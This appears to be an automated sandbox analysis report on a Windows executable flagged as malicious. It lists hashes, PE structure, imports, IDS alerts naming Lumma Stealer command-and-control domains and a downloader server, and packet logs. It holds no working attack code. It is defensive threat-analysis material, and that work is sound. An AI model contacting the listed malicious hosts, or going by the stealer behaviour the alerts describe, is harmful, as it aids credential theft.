SSDEEP: 48:cvIwWl8zsVJg77aI9daWpW8VYaKNYm8M4J6FO3FbC+q8vBFOVqCOMSvmd:uIjfvI7nb7V3JiUCKTsqCO9vmd
MD5: 24395E042B11575442D1665431870B08
SHA1: C4D4B75F52B994914AF8F8DC83C455A245788B48
SHA-256: 986967E21E032CE00F7ED69C9C24296189E35B8CA5065AB001B0491FFACE2D03
SHA-512: 005229CFE6AFEF0621031A24A442D557E62D4FE6FB18CF37B347DBBB2C1747B67F49A356283496507EC748CE4CD53539FFE519DDEEFF3DFACB2557A41FD5025B
Malicious: false
Reputation: low
Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="672954" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

Process: C:\Users\user\Desktop\L7GNkeVm5e.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 403968
Entropy (8bit): 6.686761413395804
Encrypted: false
SSDEEP: 3072:Ro2KKJ9Uzzp69NgvCbewaeDZwq0K4gowWix4WlhBTSPY89CA2dPtcDB66Ngv73mt:VJQ6rEGEPipJSPincDcMm28I
MD5: 08494E6A1E788EA3259955A4524FDFEC
SHA1: 2C8FA17D05251B515CC52694335A88C7A609E303
SHA-256: 9EEE9D46E5EA0B25BD904760A998A54550AB3800666D01E27AA8FF52626ECE94
SHA-512: A0EAE14B5AA2800F2D4E92E6735A9B3ACF6256C9DFD811DD5E9E16DF20B7DCB7911FA112AE0344A3D3DDF95A4610FBCDC729CD0F9746ED006E277D4E103482FF
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                                                                                                • Filename: NDWffRLk7z.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: g3toRYa6JE.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: lBb4XI4eGD.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................................................Rich...........PE..L......f.................6...p...............P....@..........................................................................i..(........i...........................................................................P...............................text....4.......6.................. ..`.rdata..V"...P...$...:..............@..@.data....|...........^..............@....nosu....S.......H...t..............@....muwav..Z....`......................@....roxah.......p......................@..@.rsrc....i.......j..................@..@........................................................................................................................................................................................................................................................
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:MS Windows registry file, NT/2000 or above
Category:dropped
Size (bytes):1835008
Entropy (8bit):4.4214608001522695
Encrypted:false
SSDEEP:6144:eSvfpi6ceLP/9skLmb0OTrWSPHaJG8nAgeMZMMhA2fX4WABlEnNI0uhiTw:9vloTrW+EZMM6DFy+03w
MD5:6380F69CB5E1527834C4D6E921E2ED6D
SHA1:402929490DEEB5371DD4153CBC88E2D1AF9457F9
SHA-256:F49B080C44DC9CBC07A58ED529D45B8FA9EAF7DAD203EE55A3986B477AF9B17F
SHA-512:3504AE108BDD4D87EE1B6665F370B292AA2D073481B24AB60CD9317DFDD362201AC58DCA1A61D78AFC54D82292668EEC7CF18C3B45D34BD1631B98FDC20B1A98
Malicious:false
Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...P.e...o.d...
File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):6.8908277278882695
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:L7GNkeVm5e.exe
File size:467'968 bytes
MD5:f7db525dd98ee5fbdc9c11d59b93985b
SHA1:1d722eb6df789efffa180f73bc9f3799d91115f1
SHA256:1385f8cf1b5f14beabab56b3208665cea34dd1933d4c6679cf1157287e4ec379
SHA512:9a39080f0bbe6e941fb2e2e2ac827c9c1f6d84795984de1116b32e7deaf87f9a27bae5c0e00a42eee0b1813b9578fd3fe7a5b01cbc33d0cbdb1f00169c6796f4
SSDEEP:6144:nTrkGci+k8x2itSrDQM6OX0WFfL7lC9ewMS3sQnmZ/dXJBi/9r:nTruFkM2f3zXBFfL7leewMJQmZhJgl
TLSH:ECA4AE0266FDE9D4FBB78731AE3986A42A2FFC624E74624D31547B1F09763A1C522313
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........q4...g...g...g...g...g...g...g...g...g.Udg...g...g...g...g...g...g...g...g...gRich...g................PE..L.....0e...........
Icon Hash:86c7c30b0f4e0d19
Entrypoint:0x40153a
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:0x6530B7C3 [Thu Oct 19 04:59:47 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:5
OS Version Minor:0
File Version Major:5
File Version Minor:0
Subsystem Version Major:5
Subsystem Version Minor:0
Import Hash:b347e3571c18d9445a1ad9026f10528e
Instruction
call 00007FF76C6E6C8Fh
jmp 00007FF76C6E332Dh
mov edi, edi
push ebp
mov ebp, esp
sub esp, 00000328h
mov dword ptr [00456598h], eax
mov dword ptr [00456594h], ecx
mov dword ptr [00456590h], edx
mov dword ptr [0045658Ch], ebx
mov dword ptr [00456588h], esi
mov dword ptr [00456584h], edi
mov word ptr [004565B0h], ss
mov word ptr [004565A4h], cs
mov word ptr [00456580h], ds
mov word ptr [0045657Ch], es
mov word ptr [00456578h], fs
mov word ptr [00456574h], gs
pushfd
pop dword ptr [004565A8h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [0045659Ch], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [004565A0h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [004565ACh], eax
                                                                                                                                                                                                                                                mov eax, dword ptr [ebp-00000320h]
                                                                                                                                                                                                                                                mov dword ptr [004564E8h], 00010001h
                                                                                                                                                                                                                                                mov eax, dword ptr [004565A0h]
                                                                                                                                                                                                                                                mov dword ptr [0045649Ch], eax
                                                                                                                                                                                                                                                mov dword ptr [00456490h], C0000409h
                                                                                                                                                                                                                                                mov dword ptr [00456494h], 00000001h
                                                                                                                                                                                                                                                mov eax, dword ptr [00455004h]
                                                                                                                                                                                                                                                mov dword ptr [ebp-00000328h], eax
                                                                                                                                                                                                                                                mov eax, dword ptr [00455008h]
                                                                                                                                                                                                                                                mov dword ptr [ebp-00000324h], eax
                                                                                                                                                                                                                                                call dword ptr [000000B0h]
                                                                                                                                                                                                                                                Programming Language:
                                                                                                                                                                                                                                                • [C++] VS2008 build 21022
                                                                                                                                                                                                                                                • [ASM] VS2008 build 21022
                                                                                                                                                                                                                                                • [ C ] VS2008 build 21022
                                                                                                                                                                                                                                                • [IMP] VS2005 build 50727
                                                                                                                                                                                                                                                • [RES] VS2008 build 21022
                                                                                                                                                                                                                                                • [LNK] VS2008 build 21022
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x53a6c | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc5000 | 0x19750 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x535e8 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x52000 | 0x19c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5012c | 0x50200 | b2c23762042d21f6be851f5ae867b9f7 | False | 0.8431345066302652 | data | 7.541693666484268 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x52000 | 0x23ae | 0x2400 | 70040de4e5fc9f0266fe48122edeebc4 | False | 0.375 | data | 5.542785759574896 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x55000 | 0x67c08 | 0x1600 | 9ce6aa879b2f906e425eb18d768d1945 | False | 0.2878196022727273 | data | 2.9081953038543342 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.vakolu | 0xbd000 | 0x53e5 | 0x4800 | f9debe3f07be68533bf0295e3d2ba68a | False | 0.002224392361111111 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.devuwi | 0xc3000 | 0x15a | 0x200 | bf619eac0cdf3f68d496ea9344137e8b | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pogezal | 0xc4000 | 0xc | 0x200 | bf619eac0cdf3f68d496ea9344137e8b | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0xc5000 | 0x19750 | 0x19800 | 16c80cbb07fba82957a6d15c52ec48be | False | 0.4227270986519608 | data | 5.027713803262131 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0xd5bb8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | | | 0.31023454157782515
RT_CURSOR | 0xd6a78 | 0x130 | Device independent bitmap graphic, 32 x 64 x 1, image size 0 | | | 0.7368421052631579
RT_CURSOR | 0xd6ba8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | | | 0.06130705394190871
RT_ICON | 0xc5960 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | | | 0.8128997867803838
RT_ICON | 0xc6808 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | | | 0.8592057761732852
RT_ICON | 0xc70b0 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | | | 0.7811059907834101
RT_ICON | 0xc7778 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | | | 0.791907514450867
RT_ICON | 0xc7ce0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | | | 0.8058091286307054
RT_ICON | 0xca288 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304 | | | 0.8442622950819673
RT_ICON | 0xcac10 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | | | 0.8599290780141844
RT_ICON | 0xcb0e0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | | | 0.3243603411513859
RT_ICON | 0xcbf88 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | | | 0.44765342960288806
RT_ICON | 0xcc830 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | | | 0.5190092165898618
RT_ICON | 0xccef8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | | | 0.536849710982659
RT_ICON | 0xcd460 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | | | 0.28822701688555347
RT_ICON | 0xce508 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | | | 0.289344262295082
RT_ICON | 0xcee90 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | | | 0.34131205673758863
RT_ICON | 0xcf360 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | | | 0.2785181236673774
RT_ICON | 0xd0208 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | | | 0.36462093862815886
RT_ICON | 0xd0ab0 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | | | 0.3790322580645161
RT_ICON | 0xd1178 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | | | 0.36921965317919075
RT_ICON | 0xd16e0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | | | 0.2590248962655602
RT_ICON | 0xd3c88 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | | | 0.274624765478424
RT_ICON | 0xd4d30 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | | | 0.28647540983606556
RT_ICON | 0xd56b8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | | | 0.3262411347517731
RT_STRING | 0xd9330 | 0x59a | data | | | 0.4309623430962343
RT_STRING | 0xd98d0 | 0xfc | data | | | 0.5515873015873016
RT_STRING | 0xd99d0 | 0x788 | data | | | 0.42012448132780084
RT_STRING | 0xda158 | 0x784 | data | | | 0.4287941787941788
RT_STRING | 0xda8e0 | 0x726 | data | | | 0.42568306010928963
RT_STRING | 0xdb008 | 0x644 | data | | | 0.4389027431421446
RT_STRING | 0xdb650 | 0x6bc | data | | | 0.4274941995359629
RT_STRING | 0xdbd10 | 0x7f2 | data | | | 0.41297935103244837
RT_STRING | 0xdc508 | 0x786 | data | | | 0.4221183800623053
RT_STRING | 0xdcc90 | 0x5ce | data | | | 0.43943472409152085
RT_STRING | 0xdd260 | 0x554 | data | | | 0.45234604105571846
RT_STRING | 0xdd7b8 | 0x60c | data | | | 0.4412144702842377
RT_STRING | 0xdddc8 | 0x81c | data | | | 0.41570327552986513
RT_STRING | 0xde5e8 | 0x162 | data | | | 0.5169491525423728
RT_ACCELERATOR | 0xd5b98 | 0x20 | data | | | 1.15625
RT_GROUP_CURSOR | 0xd6a60 | 0x14 | data | | | 1.25
RT_GROUP_CURSOR | 0xd9150 | 0x22 | data | | | 1.088235294117647
RT_GROUP_ICON | 0xcb078 | 0x68 | data | | | 0.7115384615384616
RT_GROUP_ICON | 0xd5b20 | 0x76 | data | | | 0.6779661016949152
RT_GROUP_ICON | 0xcf2f8 | 0x68 | data | | | 0.7115384615384616
RT_VERSION | 0xd9178 | 0x1b8 | COM executable for DOS | | | 0.5772727272727273
DLL | Import
KERNEL32.dll | SearchPathW, SetThreadContext, DeleteTimerQueueEx, DebugActiveProcessStop, CreateProcessW, SetWaitableTimer, GetConsoleAliasA, InterlockedDecrement, SetDefaultCommConfigW, SetComputerNameW, GetProcessPriorityBoost, GetModuleHandleW, GetCurrentThread, GetEnvironmentStrings, GlobalAlloc, LoadLibraryW, GetSystemTimeAdjustment, GetVersionExW, GetTimeFormatW, GetAtomNameW, GetVolumePathNameA, GetStartupInfoW, RaiseException, Module32First, SetLastError, GetProcAddress, GetLongPathNameA, SetFileAttributesA, LoadLibraryA, InterlockedExchangeAdd, MoveFileA, AddAtomA, FoldStringA, SetLocaleInfoW, OpenFileMappingW, GetFileTime, FindFirstVolumeA, FindAtomW, GetCommandLineA, GetStartupInfoA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapAlloc, GetLastError, WriteFile, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, FlushFileBuffers, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, Sleep, ExitProcess, GetStdHandle, GetModuleFileNameA, FreeEnvironmentStringsA, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetFileType, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, GetCurrentThreadId, HeapCreate, VirtualFree, HeapFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, SetFilePointer, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, VirtualAlloc, HeapReAlloc, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, MultiByteToWideChar, SetStdHandle, InitializeCriticalSectionAndSpinCount, RtlUnwind, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, CreateFileA, CloseHandle, HeapSize, GetModuleHandleA
USER32.dll | GetProcessDefaultLayout
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-12T17:52:01.923189+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49704 | 172.67.179.207 | 443 | TCP
2025-01-12T17:52:02.739573+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49705 | 176.113.115.19 | 80 | TCP
2025-01-12T17:52:05.685065+0100 | 2059088 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (skidjazzyric .click) | 1 | 192.168.2.5 | 63165 | 1.1.1.1 | 53 | UDP
2025-01-12T17:52:05.700683+0100 | 2059051 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (soundtappysk .shop) | 1 | 192.168.2.5 | 65028 | 1.1.1.1 | 53 | UDP
2025-01-12T17:52:05.714240+0100 | 2059041 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (femalsabler .shop) | 1 | 192.168.2.5 | 61207 | 1.1.1.1 | 53 | UDP
2025-01-12T17:52:05.725642+0100 | 2059035 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (apporholis .shop) | 1 | 192.168.2.5 | 65437 | 1.1.1.1 | 53 | UDP
2025-01-12T17:52:05.736408+0100 | 2059039 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crowdwarek .shop) | 1 | 192.168.2.5 | 55144 | 1.1.1.1 | 53 | UDP
2025-01-12T17:52:05.746939+0100 | 2059057 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (versersleep .shop) | 1 | 192.168.2.5 | 59972 | 1.1.1.1 | 53 | UDP
2025-01-12T17:52:05.755307+0100 | 2059037 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (chipdonkeruz .shop) | 1 | 192.168.2.5 | 52066 | 1.1.1.1 | 53 | UDP
2025-01-12T17:52:05.766501+0100 | 2059043 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (handscreamny .shop) | 1 | 192.168.2.5 | 57954 | 1.1.1.1 | 53 | UDP
2025-01-12T17:52:05.777221+0100 | 2059049 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (robinsharez .shop) | 1 | 192.168.2.5 | 55763 | 1.1.1.1 | 53 | UDP
2025-01-12T17:52:06.451964+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49706 | 104.102.49.254 | 443 | TCP
2025-01-12T17:52:06.933921+0100 | 2858666 | ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup | 1 | 192.168.2.5 | 49706 | 104.102.49.254 | 443 | TCP
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.980305910 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.980317116 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.980348110 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.980350018 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.980360985 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.980377913 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.980438948 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.980438948 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.980458975 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.980479002 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.980492115 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.980529070 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.980531931 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.980531931 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.980540991 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.980671883 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.980832100 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.980844975 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.980858088 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.980870008 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.980880022 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.980881929 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.980895042 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.980923891 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.980923891 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981257915 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981271029 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981285095 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981296062 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981301069 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981301069 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981308937 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981323004 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981324911 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981336117 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981515884 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981612921 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981653929 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981664896 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981674910 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981710911 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981710911 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981729031 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981740952 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981754065 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981766939 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981787920 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981787920 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981790066 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981801987 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981815100 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981827974 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981833935 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981833935 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981842995 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981853008 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981887102 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.981887102 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.982598066 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.982620001 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.982631922 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.982644081 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.982652903 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.982656956 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.982669115 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.982712030 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.982734919 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.982742071 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.982753992 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.982758045 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.982758999 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.982768059 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.982780933 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.982793093 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.982798100 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.982798100 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.982805967 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.982860088 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.982860088 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.986435890 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.989270926 CET4970580192.168.2.5176.113.115.19
